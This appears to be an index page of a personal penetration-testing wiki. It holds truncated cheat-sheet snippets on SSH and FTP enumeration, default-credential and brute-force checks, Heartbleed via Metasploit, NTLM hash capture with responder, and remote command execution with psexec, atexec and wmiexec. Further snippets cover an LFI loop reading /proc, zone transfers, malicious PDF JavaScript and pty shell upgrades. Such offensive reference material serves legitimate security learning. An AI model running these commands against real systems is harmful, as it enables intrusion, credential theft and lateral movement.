Enumeration Mandatory Try to access ssh ‑v $target Optional Reuse existing credentials Brute-force with existing usernames (Password-spraying) Try ssh-audit $target Try known usernaes with username as password or other found strings. Privilege Escalation Find .ssh directory on the file system and check all files within. Check sshd_config file. Check SSH version for exploits.
Enumeration Check the certificate Perform SSL-Scan Go to Checklist 80 HTTP Optional if vulnerable against heartbleed, use msf> use openssl_heartbleed. Don’t forget to use set ACTION KEYS or similar (see info)
Enumeration Mandatory Check anonymous login Try to create AND upload a file: mkdir test put /tmp/test test Check login with at least the following credentials: admin / admin admin / password Optional Download everything with wget and look for .dot files! Check login with newly found users Brute-force login Make sure to check admin / admin and other usual combinations…
Each installation has the following directory structure: /document root /_vti_bin shtml.exe /_vti_adm admin.exe /_vti_aut author.exe The shtml.exe is for executing web browser guest’s code for a web page. author.exe and admin.exe not. Tools Sparty: Frontpage Security Audit tool.
Enumeration Mandatory Open the site in a Browser. Maybe a CUPS interface is available. Performnmap -p 631 $target --script cups-info Try the PRET Printer Exploitation Toolkit is useful for printer hacking. See also HTB Laser (ippsec)python pret.py $target pcl
Checkout a repo: svn checkout svn://... Show log svn log Show infos svn info Show all branches svn ls svn://$victim --verbose The first number from the previous command shows the revision. To see the content of a repo for another revision, add the r flag: svn ls svn://$victim --verbose -r 1 svn ls svn://$victim --verbose -r 2…
This site contains links to tools / techniques which can run in the background during an engagement. Linux Windows
responder: Listen with responder on a network and wait for AD systems to ask for a DC. This can reveal a NTLM hash. (Source) Start responder on the own system: sudo responder -I tun0 --wpad Connect from the target system to this system via smb. In the Windows explorer, or in the command line via dir…
Main concepts: Tenant The “space” which an organization “rents”. Has a name. Users Groups Applications Identity model Cloud only Accounts are only in foreign systems (“cloud”) Synchronized Accounts are created and managed on-premise and synchronized to foreign systems (“cloud”) Federated Accounts are created, managed and authentificated on-premise; foreign systems (“cloud”) are also checking againts a on-premise system.…
With username/password With psexec (Prerequisites: ADMIN$ share is available, the user is part of the local administrator group on the target) With psexec via Metasploit use exploit/windows/smb/psexec With atexec (Impacket) atexec.py dom/user:pass@$target cmd.exe With wmiexec wmiexec.py domain.local/$target:$password@$ip With Smbmap smbmap -u ariley -p 'pass' -d WORKGROUP -x 'whoami' -H $target With Wmic (To run a…
Automates Windows enumeration. Github page Usage Seatbelt.exe -group=all Run Seatbelt.exe without arguments to see possible parameters. Example Seatbelt.exe OSInfo Processes Remote From another Windows system, seatbelt can connect to a victim and perform commands there. Seatbelt.exe LogonSessions -computername=$victim -username=bob -password=bobber Command aggregation There are already some groups defined which perform multiple tests at once. Seatbelt.exe -group=system [-computername=...]Seatbelt.exe…
Source on Github Creates screenshots from a list of URLs. Good way to get fast an overwiew over a new site. With nmap, use ‑oA file to save the output also as XML file. EyeWitness can use this file via ‑x file and make screenshots of all of this sites. EyeWitness.py --web -x webservers.xml
The usual order Network scan Detect hosts for a domain (use Seclist): for ip in $(cat common-subdomains.txt); do host $ip.megacorpone.com; done Reverse lookup: Find domains for addresses: for ip in $(seq 155 190); do host 50.7.67.$ip; done | grep -v "not found" Zonefile enumeration Grab zonefile from a random target domain: host -a -l fraunhofer.de ns3.fraunhofer.de…
Vulnerability Assessment Pentest Focus All vulnerabilities Only exploitable vulnerabilities Depth On the surface only On multiple layers (incl. pivoting) Risk Estimated Enables for better estimation due to combination of vulnerabilities
For reverse engineering Devicename Content /proc/$pid/maps Shows the mempory mapping of a process. Includes all used libraries. /proc/self/loginuid Own UID. Read processes If you can read /proc via a LFI: #!/bin/bash for i in {1..1024} do echo $i curl http://10.10.11.154/index.php\?page=/proc/$i/cmdline --output /tmp/proc/$i done The, look in the /tmp/proc directory for files > 0 byte. Read environment of…
Use profiles: See https://github.com/eon01/AWS-CheatSheet for many commands or https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/aws-access-token/ General Get Infos of the current used profile aws [--profile $profile] sts get-caller-identity Another possibility to gain an ARN (with account id) is to call a non-existing function and to extract data from the error message. EC2 List all EC2 images = AMI’s: aws [--profile $profile] ec2…
The DPAPI is a Windows system which stored passwords bound to the local system. In the user directory there are the keys stored in the AppData\Roaming\Microsoft\Protect\<SID> directory. From the user’s password, a master key is derived. When the user changes his password, a new master key is generated as well — and all old master…
Try this ressources if you can access files, but not listing them. http://pwnwiki.io/#!presence/windows/blind.md Cheat sheet 1 List In Apache and probably more systems you can “travel over” non-existing files because the path is shortened before checking the existence of a file. Example: /test/test.txt/../../index.html will return in an Apache the root’s index.html even if the test direcory and…
This is how a PDF document looks — with a JavaScript execution. Note that with OpenAction 6 (object block 6) this block is executed when the document is opened. Other way to create a malicious PDF: Analyse a PDF file If a PDF file is compressed, decompress it first. pdftk input.pdf output output.pdf uncompress Get details with Pdfinfo…
Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.
Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.
python -c 'import pty;pty.spawn("/bin/bash")';
python3 -c 'import pty;pty.spawn("/bin/bash")';